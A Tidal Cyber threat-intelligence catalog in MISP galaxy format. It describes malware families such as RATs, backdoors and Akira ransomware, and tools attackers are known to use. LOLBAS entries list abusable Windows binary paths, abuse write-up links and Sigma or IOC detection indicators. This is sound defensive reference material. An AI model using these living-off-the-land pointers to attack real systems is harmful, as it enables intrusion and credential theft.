
Tidal Software

Tidal Software Cluster

Authors and/or Contributors: Tidal Cyber

3PARA RAT

3PARA RAT is a remote access tool (RAT) programmed in C++ that has been used by Putter Panda. [CrowdStrike Putter Panda]

Internal MISP references

UUID 71d76208-c465-4447-8d6e-c54f142b65a4, which can be used as a unique global reference for 3PARA RAT in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0066
source | MITRE
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

4H RAT

4H RAT is malware that has been used by Putter Panda since at least 2007. [CrowdStrike Putter Panda]

Internal MISP references

UUID a15142a3-4797-4fef-8ec6-065e3322a69b, which can be used as a unique global reference for 4H RAT in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0065
source | MITRE
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

7-Zip

7-Zip is a tool used to compress files into an archive.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 4665e52b-3c5c-4a7f-9432-c89ef26f2c93, which can be used as a unique global reference for 7-Zip in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5023
source | Tidal Cyber
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

AADInternals

AADInternals is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.[AADInternals Github][AADInternals Documentation]

Internal MISP references

UUID 3d33fbf5-c21e-4587-ba31-9aeec3cc10c0, which can be used as a unique global reference for AADInternals in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Azure AD', 'Office 365', 'Windows']
software_attack_id | S0677
source | MITRE
tags | ['c9c73000-30a5-4a16-8c8b-79169f9c24aa', 'cd1b5d44-226e-4405-8985-800492cf2865']
type | ['tool']

ABK

ABK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]

Internal MISP references

UUID 394cadd0-bc4d-4181-ac53-858e84b8e3de, which can be used as a unique global reference for ABK in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0469
source | MITRE
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type | ['malware']

AccCheckConsole

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Verifies UI accessibility requirements

Author: bohops

Paths:
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe

Resources:
* https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
* https://twitter.com/bohops/status/1477717351017680899

Detection:
* Sigma: proc_creation_win_lolbin_susp_acccheckconsole.yml
* IOC: Sysmon Event ID 1 - Process Creation
* Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 [AccCheckConsole.exe - LOLBAS Project]

Internal MISP references

UUID cce705c7-49f8-4b54-b854-fd4b3a32e6ff, which can be used as a unique global reference for AccCheckConsole in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5203
source | Tidal Cyber
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

AccountRestore

AccountRestore is a .NET executable that is used to brute force Active Directory accounts. The tool searches for a list of specific users and attempts to brute force the accounts based on a password file provided by the user.[Security Joes Sockbot March 09 2022]

Internal MISP references

UUID 6bc29df2-195e-410c-ad08-f3661575492f, which can be used as a unique global reference for AccountRestore in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5059
source | Tidal Cyber
tags | ['dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c']
type | ['malware']

Action RAT

Action RAT is a remote access tool written in Delphi that has been used by SideCopy since at least December 2021 against Indian and Afghani government personnel.[MalwareBytes SideCopy Dec 2021]

Internal MISP references

UUID 202781a3-d481-4984-9e5a-31caafc20135, which can be used as a unique global reference for Action RAT in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S1028
source | MITRE
type | ['malware']

adbupd

adbupd is a backdoor used by PLATINUM that is similar to Dipsind. [Microsoft PLATINUM April 2016]

Internal MISP references

UUID f52e759a-a725-4b50-84f2-12bef89d369e, which can be used as a unique global reference for adbupd in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0202
source | MITRE
type | ['malware']

AddinUtil

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: .NET tool used for updating cache files for Microsoft Office Add-Ins.

Author: Michael McKinley @MckinleyMike

Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

Resources:
* https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

Detection:
* Sigma: proc_creation_win_addinutil_suspicious_cmdline.yml
* Sigma: proc_creation_win_addinutil_uncommon_child_process.yml
* Sigma: proc_creation_win_addinutil_uncommon_cmdline.yml
* Sigma: proc_creation_win_addinutil_uncommon_dir_exec.yml [AddinUtil.exe - LOLBAS Project]

Internal MISP references

UUID 253f97c3-ba35-4064-8ec0-892872432214, which can be used as a unique global reference for AddinUtil in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5082
source | Tidal Cyber
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

AdFind

AdFind is a free command-line query tool that can be used for gathering information from Active Directory.[Red Canary Hospital Thwarted Ryuk October 2020][FireEye FIN6 Apr 2019][FireEye Ryuk and Trickbot January 2019]

Internal MISP references

UUID 70559096-2a6b-4388-97e6-c2b16f3be78e, which can be used as a unique global reference for AdFind in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0552
source | MITRE
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '3a633b73-9c2c-4293-8577-fb97be0cda37', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865']
type | ['tool']

adplus

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Debugging tool included with Windows Debugging Tools

Author: mr.d0x

Paths:
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe

Resources:
* https://mrd0x.com/adplus-debugging-tool-lsass-dump/
* https://twitter.com/nas_bench/status/1534916659676422152
* https://twitter.com/nas_bench/status/1534915321856917506

Detection:
* Sigma: proc_creation_win_lolbin_adplus.yml
* IOC: As a Windows SDK binary, execution on a system may be suspicious [adplus.exe - LOLBAS Project]

Internal MISP references

UUID 3f229fe8-4d03-48ba-97b5-d7132510e090, which can be used as a unique global reference for adplus in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5204
source | Tidal Cyber
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

ADRecon

ADRecon is an open-source tool that can be used to gather a "holistic" view of a target Active Directory environment.[GitHub ADRecon]

Internal MISP references

UUID c227bea1-9996-49d6-97ca-10a2fc156747, which can be used as a unique global reference for ADRecon in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5270
source | Tidal Cyber
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type | ['tool']

Advanced IP Scanner

Advanced IP Scanner is a tool used to perform network scans and show network devices.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID ff0af6fd-e4a1-47c9-b4a1-7ce5074e089e, which can be used as a unique global reference for Advanced IP Scanner in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5024
source | Tidal Cyber
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

Advanced Port Scanner

Advanced Port Scanner is a tool used to perform network scans.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID f93b54cf-a17c-4739-a7af-4106055f868d, which can be used as a unique global reference for Advanced Port Scanner in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5006
source | Tidal Cyber
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

AdvancedRun

AdvancedRun is a tool used to enable software execution under user-defined settings.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 7ef15943-8061-4941-b14e-9634c0b95d28, which can be used as a unique global reference for AdvancedRun in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5025
source | Tidal Cyber
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

Advpack

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Utility for installing software and drivers with rundll32.exe

Author: LOLBAS Team

Paths:
* c:\windows\system32\advpack.dll
* c:\windows\syswow64\advpack.dll

Resources:
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
* https://twitter.com/ItsReallyNick/status/967859147977850880
* https://twitter.com/bohops/status/974497123101179904
* https://twitter.com/moriarty_meng/status/977848311603380224

Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: detect_rundll32_application_control_bypass___advpack.yml [Advpack.dll - LOLBAS Project]

Internal MISP references

UUID 6c82fc65-864a-4a8c-80ed-80a69920c44f, which can be used as a unique global reference for Advpack in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5187
source | Tidal Cyber
tags | ['7a457caf-c3b6-4a48-84cf-c1f50a2eda27', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

ADVSTORESHELL

ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [Kaspersky Sofacy] [ESET Sednit Part 2]

Internal MISP references

UUID ef7f4f5f-6f30-4059-87d1-cd8375bf1bee, which can be used as a unique global reference for ADVSTORESHELL in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0045
source | MITRE
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635', '16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

Agent.btz

Agent.btz is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. [Securelist Agent.btz]

Internal MISP references

UUID f27c9a91-c618-40c6-837d-089ba4d80f45, which can be used as a unique global reference for Agent.btz in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0092
source | MITRE
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

AgentExecutor

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Intune Management Extension included on Intune Managed Devices

Author: Eleftherios Panos

Paths:
* C:\Program Files (x86)\Microsoft Intune Management Extension

Resources:

Detection:
* Sigma: proc_creation_win_lolbin_agentexecutor.yml
* Sigma: proc_creation_win_lolbin_agentexecutor_susp_usage.yml [AgentExecutor.exe - LOLBAS Project]

Internal MISP references

UUID 27fa7573-c1d3-4857-8a45-ef501c8ea32c, which can be used as a unique global reference for AgentExecutor in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5205
source | Tidal Cyber
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

Agent Tesla

Agent Tesla is a spyware Trojan written for the .NET framework that has been observed since at least 2014.[Fortinet Agent Tesla April 2018][Bitdefender Agent Tesla April 2020][Malwarebytes Agent Tesla April 2020]

Internal MISP references

UUID 304650b1-a0b5-460c-9210-23a5b53815a4, which can be used as a unique global reference for Agent Tesla in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0331
source | MITRE
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

Akira Ransomware

A ransomware binary designed to encrypt victim files. More details about the TTPs typically observed during Akira ransomware attacks can be found in the associated Group object, "Akira Ransomware Actors".

Internal MISP references

UUID 59d598a9-e115-4d90-8fef-096015afa8d4, which can be used as a unique global reference for Akira Ransomware in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5280
source | Tidal Cyber
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '562e535e-19f5-4d6c-81ed-ce2aec544f09']
type | ['malware']

Amadey

Amadey is a Trojan bot that has been used since at least October 2018.[Korean FSI TA505 2020][BlackBerry Amadey 2020]

Internal MISP references

UUID f173ec20-ef40-436b-a859-fef017e1e767, which can be used as a unique global reference for Amadey in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S1025
source | MITRE
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

Anchor

Anchor is one of a family of backdoor malware that has been used in conjunction with TrickBot on selected high profile targets since at least 2018.[Cyberreason Anchor December 2019][Medium Anchor DNS July 2020]

Internal MISP references

UUID 9521c535-1043-4b82-ba5d-e5eaeca500ee, which can be used as a unique global reference for Anchor in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Linux', 'Windows']
software_attack_id | S0504
source | MITRE
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

ANDROMEDA

ANDROMEDA is commodity malware that was widespread in the early 2010s and continues to be observed in infections across a wide variety of industries. During the 2022 C0026 campaign, threat actors re-registered expired ANDROMEDA C2 domains to spread malware to select targets in Ukraine.[Mandiant Suspected Turla Campaign February 2023]

Internal MISP references

UUID 69aac793-9e6a-5167-bc62-823189ee2f7b, which can be used as a unique global reference for ANDROMEDA in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S1074
source | MITRE
type | ['malware']

Angry IP Scanner

Angry IP Scanner is a tool that adversaries are known to use to search for vulnerable RDP ports.[U.S. CISA Phobos February 29 2024]

Internal MISP references

UUID 8efa90ac-a894-467d-8633-16a44d270358, which can be used as a unique global reference for Angry IP Scanner in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['macOS', 'Linux', 'Windows']
software_attack_id | S5274
source | Tidal Cyber
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

AnyDesk

AnyDesk is a tool used to enable remote connections to network devices.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 922447fd-f41e-4bcf-b479-88137c81099c, which can be used as a unique global reference for AnyDesk in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5007
source | Tidal Cyber
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fb06d216-f535-45c1-993a-8c1b7aa2111c', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type | ['tool']

AppInstaller

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Tool used for installation of AppX/MSIX applications on Windows 10

Author: Wade Hickey

Paths:
* C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Resources:
* https://twitter.com/notwhickey/status/1333900137232523264

Detection:
* Sigma: dns_query_win_lolbin_appinstaller.yml [AppInstaller.exe - LOLBAS Project]

Internal MISP references

UUID 9fa7c759-172f-4ae3-ac3d-0070c3c4c439, which can be used as a unique global reference for AppInstaller in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5083
source | Tidal Cyber
tags | ['837cf289-ad09-48ca-adf9-b46b07015666', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

AppleJeus

AppleJeus is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. AppleJeus has been used by Lazarus Group, targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. AppleJeus has been used to distribute the FALLCHILL RAT.[CISA AppleJeus Feb 2021]

Internal MISP references

UUID cdeb3110-07e5-4c3d-9eef-e6f2b760ef33, which can be used as a unique global reference for AppleJeus in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['macOS', 'Windows']
software_attack_id | S0584
source | MITRE
tags | ['8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type | ['malware']

AppleSeed

AppleSeed is a backdoor that has been used by Kimsuky to target South Korean government, academic, and commercial targets since at least 2021.[Malwarebytes Kimsuky June 2021]

Internal MISP references

UUID 9df2e42e-b454-46ea-b50d-2f7d999f3d42, which can be used as a unique global reference for AppleSeed in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Android', 'Windows']
software_attack_id | S0622
source | MITRE
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

Appvlp

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Application Virtualization Utility included with Microsoft Office 2016

Author: Oddvar Moe

Paths:
* C:\Program Files\Microsoft Office\root\client\appvlp.exe
* C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe

Resources:
* https://github.com/MoooKitty/Code-Execution
* https://twitter.com/moo_hax/status/892388990686347264
* https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
* https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/

Detection:
* Sigma: proc_creation_win_lolbin_appvlp.yml [Appvlp.exe - LOLBAS Project]

Internal MISP references

UUID 1328ae5d-7220-46bb-a7ee-0c5a31eeda7f, which can be used as a unique global reference for Appvlp in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5206
source | Tidal Cyber
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

Aria-body

Aria-body is a custom backdoor that has been used by Naikon since approximately 2017.[CheckPoint Naikon May 2020]

Internal MISP references

UUID 7ba79887-d496-47aa-8b71-df7f46329322, which can be used as a unique global reference for Aria-body in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0456
source | MITRE
type | ['malware']

Arp

Arp displays and modifies information about a system's Address Resolution Protocol (ARP) cache. [TechNet Arp]

Internal MISP references

UUID 45b51950-6190-4572-b1a2-7c69d865251e, which can be used as a unique global reference for Arp in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['macOS', 'Linux', 'Windows']
software_attack_id | S0099
source | MITRE
tags | ['509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

Aspnet_Compiler

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: ASP.NET Compilation Tool

Author: Jimmy (@bohops)

Paths:
* c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
* c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Resources:
* https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
* https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8

Detection:
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* Sigma: proc_creation_win_lolbin_aspnet_compiler.yml [Aspnet_Compiler.exe - LOLBAS Project]

Internal MISP references

UUID 42763dde-8226-4f31-a3ba-face2da84dd2, which can be used as a unique global reference for Aspnet_Compiler in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5084
source | Tidal Cyber
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

ASPXSpy

ASPXSpy is a Web shell. It has been modified by Threat Group-3390 actors to create the ASPXTool version. [Dell TG-3390]

Internal MISP references

UUID a0cce010-9158-45e5-978a-f002e5c31a03, which can be used as a unique global reference for ASPXSpy in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0073
source | MITRE
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type | ['malware']

Astaroth

Astaroth is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. [Cybereason Astaroth Feb 2019][Cofense Astaroth Sept 2018][Securelist Brazilian Banking Malware July 2020]

Internal MISP references

UUID ea719a35-cbe9-4503-873d-164f68ab4544, which can be used as a unique global reference for Astaroth in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S0373
source | MITRE
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type | ['malware']

AsyncRAT

AsyncRAT is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.[Morphisec Snip3 May 2021][Cisco Operation Layover September 2021][Telefonica Snip3 December 2021]

Internal MISP references

UUID d587efff-4699-51c7-a4cc-bdbd1b302ed4, which can be used as a unique global reference for AsyncRAT in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['Windows']
software_attack_id | S1087
source | MITRE
tags | ['fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444']
type | ['tool']

at

at is used to schedule tasks on a system to run at a specified date or time.[TechNet At][Linux at]

Internal MISP references

UUID af01dc7b-a2bc-4fda-bbfe-d2be889c2860, which can be used as a unique global reference for at in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
platforms | ['macOS', 'Linux', 'Windows']
software_attack_id | S0110
source | MITRE
tags | ['5bc4c6c6-36df-4a53-920c-53e17d7027db', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

Atbroker

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Helper binary for Assistive Technology (AT)

Author: Oddvar Moe

Paths:
* C:\Windows\System32\Atbroker.exe
* C:\Windows\SysWOW64\Atbroker.exe

Resources:
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

Detection:
* Sigma: proc_creation_win_lolbin_susp_atbroker.yml
* Sigma: registry_event_susp_atbroker_change.yml
* IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
* IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
* IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware [Atbroker.exe - LOLBAS Project]

Internal MISP references

UUID 2efae55c-86f3-4234-af26-1c75e922d81a, which can be used as a unique global reference for Atbroker in MISP communities and other software using the MISP galaxy.

Associated metadata

Metadata key | Value
--- | ---
owner | TidalCyberIan
platforms | ['Windows']
software_attack_id | S5085
source | Tidal Cyber
